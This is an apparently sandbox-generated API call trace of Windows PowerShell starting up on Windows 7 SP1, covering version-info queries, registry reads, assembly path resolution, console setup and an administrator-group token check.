	[0085.586] CoTaskMemAlloc (cb=0x76) returned 0x28c8f0
	[0085.586] lstrcpyW (in: lpString1=0x28c8f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0085.586] CoTaskMemFree (pv=0x28c8f0) 
	[0085.586] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d864e4, puLen=0x16df10) returned 1
	[0085.586] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0085.586] CoTaskMemAlloc (cb=0x44) returned 0x2e2a20
	[0085.586] lstrcpyW (in: lpString1=0x2e2a20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0085.586] CoTaskMemFree (pv=0x2e2a20) 
	[0085.586] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d86548, puLen=0x16df10) returned 1
	[0085.586] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0085.586] CoTaskMemAlloc (cb=0x58) returned 0x24b750
	[0085.586] lstrcpyW (in: lpString1=0x24b750, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0085.586] CoTaskMemFree (pv=0x24b750) 
	[0085.586] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d865c4, puLen=0x16df10) returned 1
	[0085.586] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0085.586] CoTaskMemAlloc (cb=0x20) returned 0x2dc640
	[0085.586] lstrcpyW (in: lpString1=0x2dc640, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0085.586] CoTaskMemFree (pv=0x2dc640) 
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d8626c, puLen=0x16df10) returned 1
	[0085.587] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0085.587] CoTaskMemAlloc (cb=0x66) returned 0x25b610
	[0085.587] lstrcpyW (in: lpString1=0x25b610, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0085.587] CoTaskMemFree (pv=0x25b610) 
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x0, puLen=0x16df10) returned 0
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x0, puLen=0x16df10) returned 0
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x0, puLen=0x16df10) returned 0
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2d86214, puLen=0x16dee0) returned 1
	[0085.587] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0085.587] VerLanguageNameW (in: wLang=0x0, szLang=0x29eb90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0085.587] CoTaskMemFree (pv=0x29eb90) 
	[0085.587] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\", lplpBuffer=0x16df38, puLen=0x16df30 | out: lplpBuffer=0x16df38*=0x2d861a0, puLen=0x16df30) returned 1
	[0085.598] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.598] CoTaskMemFree (pv=0x2c6f80) 
	[0085.603] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.603] CoTaskMemFree (pv=0x2c6f80) 
	[0085.608] lstrlenW (lpString="䅁") returned 1
	[0085.623] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de08 | out: phkResult=0x16de08*=0x308) returned 0x0
	[0085.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ddf8 | out: phkResult=0x16ddf8*=0x30c) returned 0x0
	[0085.626] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de88 | out: phkResult=0x16de88*=0x310) returned 0x0
	[0085.637] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ddcc, lpData=0x0, lpcbData=0x16ddc8*=0x0 | out: lpType=0x16ddcc*=0x1, lpData=0x0, lpcbData=0x16ddc8*=0x56) returned 0x0
	[0085.638] CoTaskMemAlloc (cb=0x5a) returned 0x25b760
	[0085.638] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd9c, lpData=0x25b760, lpcbData=0x16dd98*=0x56 | out: lpType=0x16dd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dd98*=0x56) returned 0x0
	[0085.638] CoTaskMemFree (pv=0x25b760) 
	[0085.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.685] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.685] CoTaskMemFree (pv=0x2c6f80) 
	[0085.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0085.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0086.104] CoTaskMemAlloc (cb=0x104) returned 0x2ec910
	[0086.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ec910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.104] CoTaskMemFree (pv=0x2ec910) 
	[0086.107] CoTaskMemAlloc (cb=0x104) returned 0x2ec910
	[0086.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ec910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.107] CoTaskMemFree (pv=0x2ec910) 
	[0086.156] CoTaskMemAlloc (cb=0x104) returned 0x2eca40
	[0086.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.156] CoTaskMemFree (pv=0x2eca40) 
	[0086.158] CoTaskMemAlloc (cb=0x104) returned 0x2eca40
	[0086.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.158] CoTaskMemFree (pv=0x2eca40) 
	[0086.158] CoTaskMemAlloc (cb=0x104) returned 0x2eca40
	[0086.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.158] CoTaskMemFree (pv=0x2eca40) 
	[0086.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0086.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0086.303] CoTaskMemAlloc (cb=0x104) returned 0x2f9730
	[0086.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.303] CoTaskMemFree (pv=0x2f9730) 
	[0086.305] CoTaskMemAlloc (cb=0x104) returned 0x2f9730
	[0086.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0086.306] CoTaskMemFree (pv=0x2f9730) 
	[0086.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0086.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0087.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0087.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0087.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0087.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0087.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0087.980] CoTaskMemAlloc (cb=0x104) returned 0x303d50
	[0087.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303d50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.980] CoTaskMemFree (pv=0x303d50) 
	[0087.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0088.066] SetErrorMode (uMode=0x1) returned 0x1
	[0088.066] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dd60 | out: lpFileInformation=0x16dd60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0088.066] SetErrorMode (uMode=0x1) returned 0x1
	[0088.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.295] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.295] CoTaskMemFree (pv=0x3080c0) 
	[0088.299] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.299] CoTaskMemFree (pv=0x3080c0) 
	[0088.299] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.299] CoTaskMemFree (pv=0x3080c0) 
	[0088.303] CoCreateGuid (in: pguid=0x16e128 | out: pguid=0x16e128*(Data1=0x650df62c, Data2=0x8c94, Data3=0x40ba, Data4=([0]=0xaf, [1]=0xac, [2]=0xe9, [3]=0x7b, [4]=0xbd, [5]=0x83, [6]=0xec, [7]=0x92))) returned 0x0
	[0088.307] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.307] CoTaskMemFree (pv=0x3080c0) 
	[0088.311] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.311] CoTaskMemFree (pv=0x3080c0) 
	[0088.314] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0088.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.314] CoTaskMemFree (pv=0x3080c0) 
	[0088.321] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0088.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16ddd0 | out: lpConsoleScreenBufferInfo=0x16ddd0) returned 1
	[0088.331] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0088.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16ddd0 | out: lpConsoleScreenBufferInfo=0x16ddd0) returned 1
	[0088.333] GetVersionExW (in: lpVersionInformation=0x16dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0088.336] GetCurrentProcess () returned 0xffffffffffffffff
	[0088.337] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ddf8 | out: TokenHandle=0x16ddf8*=0x324) returned 1
	[0088.342] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dd18 | out: TokenInformation=0x0, ReturnLength=0x16dd18) returned 0
	[0088.343] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x257140
	[0088.343] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x257140, TokenInformationLength=0x4, ReturnLength=0x16dd18 | out: TokenInformation=0x257140, ReturnLength=0x16dd18) returned 1
	[0088.346] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16de78 | out: phNewToken=0x16de78*=0x320) returned 1
	[0088.346] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dd18 | out: TokenInformation=0x0, ReturnLength=0x16dd18) returned 0
	[0088.346] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x257170
	[0088.346] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x257170, TokenInformationLength=0x4, ReturnLength=0x16dd18 | out: TokenInformation=0x257170, ReturnLength=0x16dd18) returned 1
	[0088.347] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e60f20*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16de88 | out: IsMember=0x16de88) returned 1
	[0088.347] CloseHandle (hObject=0x320) returned 1
	[0088.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
